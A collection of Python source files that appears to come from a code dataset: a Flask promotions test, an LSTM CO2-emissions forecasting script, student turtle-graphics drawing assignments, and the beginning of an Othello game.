{"200": "promo_code_4"},
{"300": "promo_code_2"},
{"400": "promo_code_5"},
],
),
("", []),
]
# Carry out the tests without promotions in the system
for cart, result in tests[:1]:
resp = self.app.get("/promotions/apply", query_string=cart)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(data, result)
# Create the set of Promotions
logging.debug("Creating promotions")
for promo in promotions:
test_promotion = PromotionFactory()
for attribute in promo:
setattr(test_promotion, attribute, promo[attribute])
if promo["promo_code"] == "promo_code_1":
test_promotion.products.append(product_1)
test_promotion.products.append(product_2)
elif promo["promo_code"] == "promo_code_3":
test_promotion.products.append(product_1)
elif promo["promo_code"] == "promo_code_4":
test_promotion.products.append(product_2)
elif promo["promo_code"] == "promo_code_5":
test_promotion.products.append(product_4)
logging.debug(
f" Promo: {promo['promo_code']} (Promo ID: {test_promotion.id}): Products - {test_promotion.products}"
)
self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
logging.debug("Promotions created")
# Carry out the tests
for cart, result in tests[1:]:
logging.debug(cart)
resp = self.app.get("/promotions/apply", query_string=cart)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(data, result)
# ---------------------------------------------------------------
# > Test Cases for Error Handlers <
# ---------------------------------------------------------------
def test_invalid_content_type(self):
""" Test Invalid Content Type """
resp = self.app.post(
"/promotions", json="This is a string", content_type="text/html"
)
print(resp.__dir__())
print(resp.get_json())
self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)
def test_bad_request(self):
""" Test Bad Request """
resp = self.app.post(
"/promotions", json="{'test': 'promotion'}", content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
def test_method_not_allowed(self):
""" Test Method Not Allowed """
resp = self.app.put("/promotions")
self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
######################################################################
# M A I N
######################################################################
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "2020-SKKU-S-HERO/mobius_adaptation",
"score": 3
} |
#### File: mobius_adaptation/database/pred_model_update.py
```python
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.layers import LSTM, Dense, Dropout, Activation
from tensorflow.keras.models import Sequential
from sqlalchemy import create_engine
from datetime import timedelta
engine = create_engine('mysql+pymysql://root:shero@localhost/sheroDB', echo=True)
def get_data_from_db():
sql = 'select * from co2_emissions where location="인천"'
data = pd.read_sql(sql, engine)
data['date_time'] = pd.to_datetime(data['date_time'])
data = data.set_index('date_time',inplace=False)
data = data.resample(rule='1440T').sum()
return data
def scale(df):
scaler = MinMaxScaler(feature_range=(0, 1))
scale_cols = ['limestone', 'clay', 'silica_stone', 'iron_oxide', 'gypsum', 'coal', 'emissions']
scaled_data = scaler.fit_transform(df[scale_cols])
scaled_data = pd.DataFrame(scaled_data)
scaled_data.columns = scale_cols
#print("scaled_data ::::")
#print(scaled_data.head(31))
return (scaled_data, scaler)
def denormalize(feature, pred ,scaler):
denorm_predict = []
feature["emissions"] = pred
denorm = scaler.inverse_transform(feature)
for item in denorm:
denorm_predict.append(item[6])
return np.array(denorm_predict)
def feature_label_split(df):
feature_cols = ['limestone', 'clay', 'silica_stone', 'iron_oxide', 'gypsum', 'coal']
label_cols = ['emissions']
train_feature = df[feature_cols]
train_label = df[label_cols]
return (train_feature, train_label)
def make_3D(feature, label, window_size):
dataX, dataY = [], []
for i in range(len(feature)-window_size):
dataX.append(np.array(feature.iloc[i:i+window_size]))
dataY.append(np.array(label.iloc[i+window_size]))
return (np.array(dataX), np.array(dataY))
def make_single_3D(feature, window_size):
dataX = []
for i in range(len(feature)-window_size):
dataX.append(np.array(feature.iloc[i:i+window_size]))
return np.array(dataX)
data = get_data_from_db()
train, scaler = scale(data)
#train = data
feature, label = feature_label_split(train)
train_feature_3d, train_label_3d = make_3D(feature, label, 30)
def build_model(feature_3d):
model = Sequential()
model.add(LSTM(64, input_shape=(feature_3d.shape[1], feature_3d.shape[2]),activation='relu',return_sequences=False))
model.add(Dropout(0.3))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
return model
test_feature = pd.concat([feature.iloc[-90:, :], feature.iloc[-365:-305, :]], ignore_index=True)
denom_feature = pd.concat([feature.iloc[-60:, :], feature.iloc[-365:-305, :]], ignore_index=True)
#print(denom_feature.head(20))
#print(denom_feature.info())
#print()
test_label = np.array(label.iloc[-60:, :]).flatten()
test_label = np.append(test_label, np.zeros(60))
test_feature_3d = make_single_3D(test_feature, 30)
#print(train.iloc[-90:-40, :])
#print(test_feature.head())
#print(test_label)
model = build_model(train_feature_3d)
hist = model.fit(train_feature_3d, train_label_3d, epochs=300, batch_size=64)
predict_value = model.predict(test_feature_3d)
predict_value = predict_value.flatten()
denom_predict_value = denormalize(denom_feature, predict_value, scaler)
denom_real_value = np.array(data.iloc[-60:, 0]).flatten()
denom_real_value = np.append(denom_real_value, np.zeros(60))
#print(denom_real_value)
#print(data.head())
loc=[]
for i in range(120):
loc.append(['인천'])
loc = np.array(loc).flatten()
pred_date = data.iloc[-120:]
pred_date = np.array(pred_date.index)
pred_date = pd.DatetimeIndex(pred_date) + timedelta(days=60)
pred_date = np.array(pred_date)
#dic = {'date_time' : pred_date, 'actual_value' : test_label, 'predict_value' : predict_value , 'location' : loc}
dic = {'date_time' : pred_date, 'actual_value' : denom_real_value, 'predict_value' : denom_predict_value , 'location' : loc}
dff = pd.DataFrame(dic)
dff = pd.DataFrame(dic)
print(dff.head(20))
dff.to_sql(name='predict_value',con=engine, if_exists='append')
``` |
{
"source": "2020-Spring-CSC-226/a03-master",
"score": 3
} |
#### File: 2020-Spring-CSC-226/a03-master/a03_dabbsr.py
```python
<NAME>
dabbsr
https://docs.google.com/document/d/1NYZeAN_fGb0iTEdF8upy8mrT_fNUva248VOr3c7x7pY/edit#
import turtle
wn = turtle.Screen()
wn.colormode(255)
wn.bgcolor(5,160,170)
luigi = turtle.Turtle()
def red_shape():
"""
first
"""
luigi.color("Red")
luigi.begin_fill()
luigi.speed(0)
luigi.left(15)
luigi.forward(45)
print(luigi.pos())
luigi.left(60)
luigi.forward(45)
luigi.left(40)
luigi.forward(132)
print(luigi.pos())
luigi.setpos(0,0)
luigi.end_fill()
def yellow_shape():
"""
second
"""
luigi.color("Yellow")
luigi.begin_fill()
luigi.forward(70)
print(luigi.pos())
luigi.setpos(-0.67,174.75)
luigi.setpos(0,0)
luigi.end_fill()
def og_shape():
"""
third
"""
luigi.color("Orange")
luigi.setheading(180)
luigi.begin_fill()
luigi.forward(200)
luigi.setpos(-29.58,63.44)
luigi.setpos(0,0)
luigi.end_fill()
def green_shape():
"""
fourth
"""
luigi.color("Green")
luigi.setheading(180)
luigi.begin_fill()
luigi.forward(200)
luigi.setpos(-29.58,-63.44)
luigi.setpos(0,0)
luigi.end_fill()
def wt_shape():
"""
fifth
"""
luigi.color("White")
luigi.begin_fill()
luigi.setpos(-29.58,-63.44)
print(luigi.pos())
luigi.setpos(-0.67,-174.75)
luigi.setpos(0,0)
luigi.end_fill()
def pnk_shape():
"""
final
"""
luigi.color("Pink")
luigi.setheading(0)
luigi.begin_fill()
luigi.left(-15)
luigi.forward(45)
print(luigi.pos())
luigi.left(-60)
luigi.forward(45)
luigi.left(-40)
luigi.forward(132)
print(luigi.pos())
luigi.setpos(0,0)
luigi.end_fill()
def main():
"""
puts all sections together of the pop art
"""
red_shape()
yellow_shape()
og_shape()
green_shape()
wt_shape()
pnk_shape()
wn.title("Pop Art")
wn.exitonclick()
main()
```
#### File: 2020-Spring-CSC-226/a03-master/A03_davisj2.py
```python
import turtle
def move(t, x, y):
t.up()
t.setpos(x, y)
t.down()
def borders(t):
t.penup()
t.setpos(-250,-250)
t.pendown()
t.pensize(20)
for i in range(4):
t.forward(500)
t.left(90)
def ground(t):
t.penup()
t.setpos(-250,-200)
t.pendown()
t.color('#00ff00')
t.begin_fill()
t.forward(500)
t.right(90)
t.forward(50)
t.right(90)
t.forward(500)
t.right(90)
t.forward(50)
t.end_fill()
def house(t):
t.penup()
t.setpos(-190,-200)
t.pendown()
t.color('#964b00')
t.begin_fill()
for i in range(4):
t.forward(260)
t.left(90)
t.end_fill()
def roof(t):
t.penup()
t.setpos(-190,60)
t.pendown()
t.color('#B5651D')
t.begin_fill()
for i in range(3):
t.forward(260)
t.left(120)
t.end_fill()
def sun(t):
t.penup()
t.setpos(160,60)
t.pendown()
t.color('#ffff00')
t.begin_fill()
t.circle(70)
t.end_fill()
def main():
J = turtle.Turtle()
X = turtle.Turtle()
C = turtle.Turtle()
T = turtle.Turtle()
S = turtle.Turtle()
wn = turtle.Screen()
wn.bgcolor('#add8e6')
wn.screensize(500,500)
borders(J)
ground(X)
house(C)
roof(T)
sun(S)
wn.exitonclick()
main()
```
#### File: 2020-Spring-CSC-226/a03-master/a03_fotim.py
```python
import turtle
from time import sleep
def move (t, x, y):
"""
Moves the turtle to a specified location using X, Y coordinate pairs.
:param t: The turtle to be moved
:param x: The X coordinate
:param y: The Y coordinate
:return: None
"""
t.up()
t.setpos(x, y)
t.down()
def OutsideRing(Outside, i):
move(Outside, -45, 170)
while i < 3: # The loop that creates the outer ring.
i += 1
Outside.fd(80)
Outside.right(80)
Outside.fd(20)
Outside.left(65)
Outside.circle(-100, 90)
Outside.left(65)
Outside.fd(20)
Outside.right(80)
i = 0
def InnerRing(Inside, i, k):
move(Inside, -5, 115)
while i < 3: # The loop that creates the inner ring.
i += 1
Inside.circle(-70, 120)
Inside.right(90) # Turns to create each arrow.
Inside.back(20)
Inside.fd(60)
Inside.right(90)
Inside.fd(10)
while k < 3: # The loop that creates the tips of the arrows within the inner ring.
k += 1
Inside.left(120)
Inside.fd(20)
k = 0
Inside.back(10)
Inside.left(90)
Inside.fd(10)
Inside.back(50)
Inside.left(90) # The end of each arrow
def SCP(Letters):
move(Letters, -67, -100) # Draws the S
Letters.fd(18)
Letters.back(18)
Letters.circle(-20, -180)
Letters.circle(20, -180)
Letters.back(18)
move(Letters, 8, -102) # Draws the C
Letters.fd(10)
Letters.back(10)
Letters.circle(-38, -180)
Letters.back(10)
# print(Letters.pos())
move(Letters, 38, -178) # Draws the P
Letters.right(90)
Letters.fd(60)
Letters.circle(-20, 270)
def main():
wn = turtle.Screen()
Outside = turtle.Turtle()
Inside = turtle.Turtle()
Letters = turtle.Turtle()
i = 0
k = 0
Outside.width(10)
Inside.width(10)
Letters.width(15)
wn.bgcolor(0, 0, 0)
Outside.pencolor(1, 1, 1)
Inside.pencolor(1, 1, 1)
Letters.pencolor(1, 1, 1)
OutsideRing(Outside, i)
InnerRing(Inside, i, k)
SCP(Letters)
wn.exitonclick()
main()
```
#### File: 2020-Spring-CSC-226/a03-master/A03_jacciboggs.py
```python
import turtle
#make the roof made of bricks
def make_roof(wn, shape):
"""
Draws a roof made of bricks
:param wn:
:param shape:
:return:
"""
wn.register_shape("Bricks.gif") #registers a sh
#draw the body of the house - a rectangle
def draw_square(houseturtle):
"""
:param houseturtle:
:return:
"""
houseturtle.color(50, 168, 82)
houseturtle.penup()
houseturtle.goto(-250, -250)
houseturtle.pendown()
houseturtle.fillcolor(50, 168, 82)
for i in range (4):
houseturtle.forward(300)
houseturtle.left(90)
#draw the roof of the house - a triangle on top of the rectangle
def draw_roof(houseturtle):
"""
:param houseturtle:
:return:
"""
houseturtle.color(50, 168, 82)
houseturtle.penup()
houseturtle.goto(-230, -230)
houseturtle.pendown()
houseturtle.left(180)
houseturtle.forward(400)
houseturtle.begin_fill()
for i in range (3):
houseturtle.right(120)
houseturtle.forward(200)
houseturtle.end_fill()
houseturtle.penup()
#draw a chimney - a small rectangle at the top of the triangle
#draw smoke coming out of the chimney
#main
def main():
"""
:return:
"""
houseturtle = turtle.Turtle()
wn = turtle.Screen()
wn.colormode(255)
houseturtle.pensize (10)
draw_square(houseturtle)
draw_roof(houseturtle)
#draw_chimney(houseturtle)
#draw_smoke(houseturtle)
wn.exitonclick()
main()
```
#### File: 2020-Spring-CSC-226/a03-master/a03_quintanarpenaa.py
```python
import turtle
def smokey(n):
"""creates smoke"""
n.left(-10)
n.circle(20, extent=-180)
n.right(180)
def rep(bd):
"""moves the turtle back into position"""
bd.penup()
bd.right(90)
bd.fd(320)
bd.right(90)
bd.fd(285)
bd.left(180)
bd.pendown()
def smoke(mn):
"""creates smoke"""
mn.left(-10)
mn.circle(20, extent=-180)
mn.right(180)
def chimmeny(ui):
ui.color('black')
ui.begin_fill()
ui.right(30)
ui.fd(20)
ui.left(30)
ui.fd(40)
ui.left(90)
ui.fd(10)
ui.left(90)
ui.fd(56)
ui.left(180)
ui.fd(56)
ui.end_fill()
def reposss(ht):
ht.penup()
ht.left(90)
ht.fd(373)
ht.pendown()
def reposs(yu):
"""Positions the turtle to make a door"""
yu.penup()
yu.fd(25)
yu.right(90)
yu.fd(200)
yu.left(90)
yu.fd(75)
yu.pendown()
def door(rt):
"""makes a door"""
rt.color("red")
rt.begin_fill()
rt.fd(50)
rt.left(90)
rt.fd(70)
rt.left(90)
rt.fd(50)
rt.left(90)
rt.fd(70)
rt.end_fill()
rt.color("blue")
rt.penup()
rt.backward(25)
rt.left(90)
rt.fd(10)
rt.pendown()
rt.begin_fill()
rt.circle(5)
rt.end_fill()
rt.penup()
rt.backward(10)
rt.right(90)
rt.fd(25)
rt.left(90)
rt.pendown()
def repos(er):
"""repositions the turtle again for the roof"""
er.penup()
er.backward(260)
er.left(90)
er.fd(100)
er.right(90)
er.fd(25)
er.pendown()
def repo(op):
"""makes the turtle go in position to make windows"""
op.left(90)
op.fd(100)
op.right(90)
def roof(ro):
"""makes a roof"""
ro.color("blue")
ro.begin_fill()
ro.backward(50)
ro.left(60)
ro.fd(250)
ro.right(120)
ro.fd(250)
ro.left(60)
ro.backward(250)
ro.end_fill()
def reposition(qw):
"""repositions the turtle on the bottom left of the screen"""
qw.penup()
qw.right(135)
qw.fd(350)
qw.right(-135)
qw.pendown()
def house(wt):
"""Makes the frame of the house"""
wt.color("black")
wt.begin_fill()
wt.fd(200)
wt.left(90)
wt.fd(200)
wt.left(90)
wt.fd(200)
wt.left(90)
wt.fd(200)
wt.left(90)
wt.end_fill()
def windows(nt):
"""This makes windows """
nt.color("yellow")
nt.begin_fill()
nt.fd(70)
nt.left(90)
nt.fd(70)
nt.left(90)
nt.fd(70)
nt.left(90)
nt.fd(70)
nt.end_fill()
nt.left(180)
nt.fd(35)
nt.right(90)
nt.color("black")
nt.fd(70)
nt.backward(35)
nt.left(90)
nt.fd(35)
nt.backward(70)
nt.right(90)
nt.penup()
nt.backward(35)
nt.fd(130)
nt.pendown()
def main():
roe = turtle.Turtle()
roe.speed(0)
wn = turtle.Screen()
wn.bgcolor("#738678")
roe.pensize(2)
reposition(roe)
house(roe)
repo(roe)
for i in range(2):
windows(roe)
repos(roe)
roof(roe)
reposs(roe)
door(roe)
reposss(roe)
chimmeny(roe)
for i in range(5):
smoke(roe)
roe.left(-180)
for i in range(5):
roe.penup()
smoke(roe)
roe.pendown()
rep(roe)
for i in range(7):
smokey(roe)
wn.exitonclick()
main()
# turtle.color ("#738678") #this code makes a circle the color xanadu
# turtle.begin_fill()
# turtle.circle(60)
# turtle.end_fill()
```
#### File: 2020-Spring-CSC-226/a03-master/a03_redmonl.py
```python
import turtle
wn = turtle.Screen() # creates the screen
wn.bgcolor('pink')
bud = turtle.Turtle() # creates the first turtle
bud.hideturtle()
petal = turtle.Turtle() # creates the second turtle
petal.hideturtle()
petal.up()
petal.goto(17,25) # puts the second turtle into position
bud.fillcolor('yellow') # creates the center of the flower
bud.begin_fill()
bud.circle(20)
bud.end_fill()
def draw_petal(): # the parameters for the petal
petal.fillcolor('#CC0000')
petal.begin_fill()
petal.circle(100,70)
petal.left(110)
petal.circle(100,70)
petal.end_fill()
def main(): # draws the flower
draw_petal()
petal.goto(8,2)
draw_petal()
petal.goto(-20,20)
draw_petal()
petal.goto(17,30)
draw_petal()
petal.goto(10,4)
draw_petal()
petal.goto(-20,18)
draw_petal()
petal.goto(0,40)
draw_petal()
petal.goto(17,10)
draw_petal()
petal.goto(-10,5)
draw_petal()
petal.goto(-10,35)
draw_petal()
petal.goto(17,12)
draw_petal()
petal.goto(0,0)
draw_petal()
petal.goto(-17,30)
draw_petal()
main()
wn.mainloop()
```
#### File: 2020-Spring-CSC-226/a03-master/a03_roshan.py
```python
import turtle
house = turtle.Turtle()
def make_triangle():
"""
makes a triangle on top of the main houses
"""
house.right(135)
house.forward(200)
house.right(113)
house.forward(163)
house.penup()
house.right(24)
house.forward(195)
house.right(90)
house.forward(100)
def make_square():
"""
makes the square
:return:
"""
house.penup()
house.left(180)
house.forward(200)
house.left(90)
house.pendown()
house.forward(200)
house.left(90)
house.forward(200)
house.left(90)
house.forward(200)
house.left(90)
house.forward(200)
def make_door():
"""
makes the door of the house
"""
house.pendown()
house.right(90)
house.forward(45)
house.left(90)
house.forward(25)
house.left(90)
house.forward(45)
def main():
"""
bringing all the sections together to make the house
"""
wn = turtle.Screen()
wn.bgcolor("#FF0000") #hexcode for red
wn.title("house")
make_square()
make_triangle()
make_door()
wn.exitonclick()
main()
```
#### File: 2020-Spring-CSC-226/a03-master/Jarju_a03.py
```python
import turtle # Imports turtle from the python Library
def draw_base(cup):
"""
draws the base of a cup
:param cup: a Turtle object
:return: None (void function)
"""
cup.hideturtle()
cup.color('#61d4b3')
cup.pensize(10)
cup.begin_fill()
for i in range(4):
cup.forward(45)
cup.right(90)
cup.penup()
cup.forward(45)
cup.right(90)
cup.forward(20)
cup.circle(15)
cup.end_fill()
def curve(love):
"""
draws the love sign on the table
:param love: a Turtle object
:return: None (void function)
"""
love.hideturtle()
love.begin_fill()
love.setpos(0, 10)
for i in range(50): # Setting up a loop
love.right(1)
love.forward(1)
love.speed(0)
love.color('#c81912') # First color is the border color and second color is the fill color.
love.begin_fill()
love.left(140) # Turns the turtle left at an angle of 140 degrees.
love.forward(95)
love.color('#c81912')
love.end_fill()
def draws_table(table):
"""""
draws a table
:param table: a Turtle object
:return: None (void function)
"""
table.hideturtle()
table.pensize(18)
table.penup()
table.setpos(-45, -59)
table.pendown()
table.begin_fill()
table.color('#00ff22')
table.forward(100)
table.right(45)
table.forward(100)
table.right(125)
table.forward(30)
table.right(45)
table.forward(65)
table.left(35)
table.forward(125)
table.left(53)
table.forward(62)
table.right(90)
table.forward(30)
table.right(94)
table.forward(98)
table.right(55)
table.forward(50)
table.end_fill()
def make_text(txt):
"""
Writes text to the screen.
:param txt: a Turtle object
:return: None
"""
txt.hideturtle()
txt.penup()
txt.color("#ffcc00")
txt.setpos(0, 120)
txt.write('Computer Science Is Life!', move=False, align='center', font=("Algerian", 20, ("bold", "normal")))
def main():
wn = turtle.Screen()
wn.bgcolor('#ffffff') # Sets background color.
cup = turtle.Turtle()
table = turtle.Turtle()
love = turtle.Turtle()
txt = turtle.Turtle()
# Call Functions
draw_base(cup)
draws_table(table)
make_text(txt)
curve(love)
wn.exitonclick()
main() #call main()
```
#### File: 2020-Spring-CSC-226/a03-master/reevesv2.py
```python
import turtle
def house(ab):
"""
Docstring for function_1
"""
pass
ab.begin_fill()
for i in range(2):
ab.forward(500)
ab.left(90)
ab.forward(250)
ab.left(90)
ab.end_fill()
# ....
def outlinehouse(ab):
"""
Docstring for function_1
"""
pass
for i in range(2):
ab.forward(500)
ab.left(90)
ab.forward(250)
ab.left(90)
def roof(cd):
"""
this function draws the wicked cool roof
"""
pass
cd.begin_fill()
cd.forward(600)
cd.left(150)
cd.forward(500)
cd.left(120)
cd.forward(200)
cd.right(90)
cd.forward(167)
cd.left(90)
cd.forward(50)
cd.end_fill()
# ...
def outlineroof(cd):
"""
this function draws the wicked cool roof
"""
pass
cd.forward(600)
cd.left(150)
cd.forward(500)
cd.left(120)
cd.forward(200)
cd.right(90)
cd.forward(167)
cd.left(90)
cd.forward(50)
# ...
def pole(ef):
"""
draw the pole for the flag
"""
pass
ef.begin_fill()
ef.left(90)
for i in range(2):
ef.forward(10)
ef.left(90)
ef.forward(350)
ef.left(90)
ef.end_fill()
#.....
def flag(gh):
"""
this function draws the flag
"""
pass
gh.begin_fill()
for i in range(2):
gh.forward(90)
gh.left(90)
gh.forward(60)
gh.left(90)
gh.end_fill()
#....
def cross(ij):
"""
this function draws the white cross on the swiss flag
"""
ij.begin_fill()
for i in range(4):
ij.left(90)
ij.forward(25)
ij.left(90)
ij.forward(5)
ij.left(90)
ij.forward(25)
ij.end_fill()
#end of function
def door (kl):
"""
this function draws the door the the door knob
"""
kl.begin_fill()
for i in range(2):
kl.forward(60)
kl.left(90)
kl.forward(150)
kl.left(90)
kl.end_fill()
#end of door function
def knob(mn):
"""
this function draws the door knob
"""
mn.begin_fill()
for i in range(15):
mn.forward(2)
mn.left(24)
mn.end_fill()
#end of knob function
def window(op):
"""
this function draws the door knob
"""
op.begin_fill()
for i in range(2):
op.forward(89)
op.left(90)
op.forward(59)
op.left(90)
op.end_fill()
#end of knob function
def bars(ij):
"""
this function draws the bars across the window
"""
ij.begin_fill()
for i in range(2):
ij.left(90)
ij.forward(32)
ij.left(90)
ij.forward(5)
ij.left(90)
ij.forward(32)
ij.left(90)
ij.forward(47)
ij.left(90)
ij.forward(5)
ij.left(90)
ij.forward(47)
ij.end_fill()
ij.right(90)
ij.forward(30)
ij.left(90)
ij.forward(44)
ij.left(90)
ij.forward(64)
ij.left(90)
ij.forward(94)
ij.left(90)
ij.forward(64)
ij.left(90)
ij.forward(49)
#end of function
def rail(kl):
"""
this function draws the bars across the window
"""
for i in range(2):
kl.begin_fill()
kl.forward(3)
kl.left(90)
kl.forward(100)
kl.left(90)
kl.end_fill()
#end of function
def toprail(mn):
for i in range(2):
mn.begin_fill()
mn.forward(164)
mn.left(90)
mn.forward(6)
mn.left(90)
mn.end_fill()
#end of function
def main():
"""
Docstring for main
"""
# ...
wn = turtle.Screen() # Set up the window and its attributes
wn.bgcolor("green")
wn.title("My Beautiful Dorm")
reeves = turtle.Turtle()
reeves.speed(0)
reeves.pensize(3)
reeves.penup()
reeves.setpos(-250, -300)
reeves.pendown()
reeves.color("brown")
reeves.pensize(3)
house(reeves)
reeves.color("black")
reeves.penup()
reeves.setpos(-300, -50)
reeves.pendown()
reeves.color("Blue")
roof(reeves)
reeves.color("black")
reeves.penup()
reeves.setpos(-210, 2)
reeves.pendown()
reeves.color("black")
pole(reeves)
reeves.penup()
reeves.setpos(-200, 270)
reeves.pendown()
reeves.color("red")
flag(reeves)
reeves.penup()
reeves.setpos(-150, 300)
reeves.pendown()
reeves.color("white")
cross(reeves)
reeves.penup()
reeves.setpos(-80, -300)
reeves.pendown()
reeves.color("black")
door(reeves)
reeves.penup()
reeves.setpos(-75, -240)
reeves.pendown()
reeves.color("blue")
knob(reeves)
# Below is the top left window
reeves.penup()
reeves.setpos(-199, -150)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(-151, -123)
reeves.pendown()
reeves.color("black")
bars(reeves)
# Below is the bottom left window
reeves.penup()
reeves.setpos(-199, -245)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(-151, -218)
reeves.pendown()
reeves.color("black")
bars(reeves)
# Below is the middle bottom window
reeves.penup()
reeves.setpos(0, -245)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(48, -218)
reeves.pendown()
reeves.color("black")
bars(reeves)
# Below is the middle top window
reeves.penup()
reeves.setpos(0, -150)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(48, -123)
reeves.pendown()
reeves.color("black")
bars(reeves)
# Below is the right top window
reeves.penup()
reeves.setpos(120, -150)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(168, -123)
reeves.pendown()
reeves.color("black")
bars(reeves)
# Below is the right bottom window
reeves.penup()
reeves.setpos(120, -245)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(168, -218)
reeves.pendown()
reeves.color("black")
bars(reeves)
#Outline the house and the roof
reeves.pensize(3)
reeves.penup()
reeves.setpos(-250, -300)
reeves.pendown()
reeves.color("black")
outlinehouse(reeves)
reeves.penup()
reeves.setpos(-300, -50)
reeves.pendown()
reeves.color("black")
outlineroof(reeves)
#Start drawing rail
reeves.penup()
reeves.setpos(-290, 2)
reeves.pendown()
reeves.color("white")
reeves.left(90)
rail(reeves)
reeves.penup()
reeves.setpos(-270, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-250, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-230, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-210, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-190, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-170, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-150, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-300, 80)
reeves.pendown()
toprail(reeves)
reeves.penup()
reeves.setpos(-1000, -1000)
reeves.pendown()
wn.exitonclick()
main()
``` |
{
"source": "2021AIT-OOP2-G06/oop2-othello",
"score": 3
} |
#### File: 2021AIT-OOP2-G06/oop2-othello/othello.py
```python
from tabnanny import check
grid = [
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 2, 0, 0, 0],
[0, 0, 0, 2, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]
]
def selectCell(row,col,player):
#ひっくり返せる石があるか確認、なければ何も置かずreturn
check = Check(col,row,player)
if(check):
return "NG"
if ((player==1) and (grid[row][col]==0)):
grid[row][col] = 1
#isValid(row, col,player)
Overturn(col,row,player)
#print(grid)
#return "OK"
elif((player==2) and (grid[row][col]==0)):
grid[row][col] = 2
Overturn(col,row,player)
#isValid(row, col,player)
#print(grid)
#return "OK"
#else:
#return "ok"
if player == 1:
yer = 2
else :
yer = 1
pas = Put(yer)
if(pas):
return "PASS"
else :
return "OK"
# 石をひっくり返す動作
def Overturn(x,y,player):
# ひっくり返せる座標を取得
#self.Reverce(x, y)
overturn_x = []
overturn_y = []
kensa = [-1, 0, 1]
# 置いたマスの縦、横、ななめのひっくり返せる石の座標の取得
# 取得された座標はのself.overturn_x、self.overturn_yに格納される
for xx in kensa:
for yy in kensa:
# xxとyyが置いた石の座標と被ったときの処理を飛ばす
if xx == 0 and yy == 0:
continue
tmpx = []
tmpy = []
takasa = 0
# 直線の石を調べる
while(True):
takasa += 1
# x座標とy座標の石を直線的に探す
tyokusen_x = x + (xx * takasa)
tyokusen_y = y + (yy * takasa)
# rxとryに石はあるのかの判定と、ひっくり返せるかの判定
if 0 <= tyokusen_x < 8 and 0 <= tyokusen_y < 8:
osero = grid[int(tyokusen_y)][int(tyokusen_x)]
# 自分の石が見つかったとき
if osero == player:
if tmpx != [] and tmpy != []:
# print("追加しました")
overturn_x.append(tmpx)
overturn_y.append(tmpy)
break
else:
break
# 相手の石が見つかったとき
elif osero != player:
if osero == 0:
break
else:
tmpx.append(tyokusen_x)
tmpy.append(tyokusen_y)
else:
break
# x座標とy座標を格納
xx = overturn_x
yy = overturn_y
# 石をひっくり返す
for i in range(len(overturn_y)):
for j in range(len(overturn_y[i])):
# print(self.overturn_x[i][j])
# print(self.overturn_y[i][j])
grid[yy[i][j]][xx[i][j]] = player
print(overturn_x)
print(overturn_y)
# プレイヤーの交代
#if player == 1:
#player = 2
#else:
#player = 1
def Check( x, y, player):
# すでに石が置いてある時
if grid[y][x] != 0:
#print("ここには置けません")
return True
overturn_x = []
overturn_y = []
kensa = [-1, 0, 1]
# 置いたマスの縦、横、ななめのひっくり返せる石の座標の取得
# 取得された座標はのself.overturn_x、self.overturn_yに格納される
for xx in kensa:
for yy in kensa:
# xxとyyが置いた石の座標と被ったときの処理を飛ばす
if xx == 0 and yy == 0:
continue
tmpx = []
tmpy = []
takasa = 0
# 直線の石を調べる
while(True):
takasa += 1
# x座標とy座標の石を直線的に探す
tyokusen_x = x + (xx * takasa)
tyokusen_y = y + (yy * takasa)
# rxとryに石はあるのかの判定と、ひっくり返せるかの判定
if 0 <= tyokusen_x < 8 and 0 <= tyokusen_y < 8:
osero = grid[int(tyokusen_y)][int(tyokusen_x)]
# 自分の石が見つかったとき
if osero == player:
if tmpx != [] and tmpy != []:
# print("追加しました")
overturn_x.append(tmpx)
overturn_y.append(tmpy)
break
else:
break
# 相手の石が見つかったとき
elif osero != player:
if osero == 0:
break
else:
tmpx.append(tyokusen_x)
tmpy.append(tyokusen_y)
else:
break
# 来た座標に置いた時、石をひっくり返せるかどうか
for i in range(len(overturn_x)):
if overturn_x[i] != 0:
#print("ここにおけます")
#grid[y][x] = player
return False
#print("ここに置けません")
return True
def Put(player):
put_x = []
put_y = []
for x in range(8):
for y in range(8):
# 石が置いてあるマスの場合
# print(self.list[x][y])
if grid[int(y)][int(x)] != 0:
continue
# この座標に置いた場合のひっくり返せる石をさがす
# print(x,y)
#self.Reverce(x, y)
overturn_x = []
overturn_y = []
kensa = [-1, 0, 1]
# 置いたマスの縦、横、ななめのひっくり返せる石の座標の取得
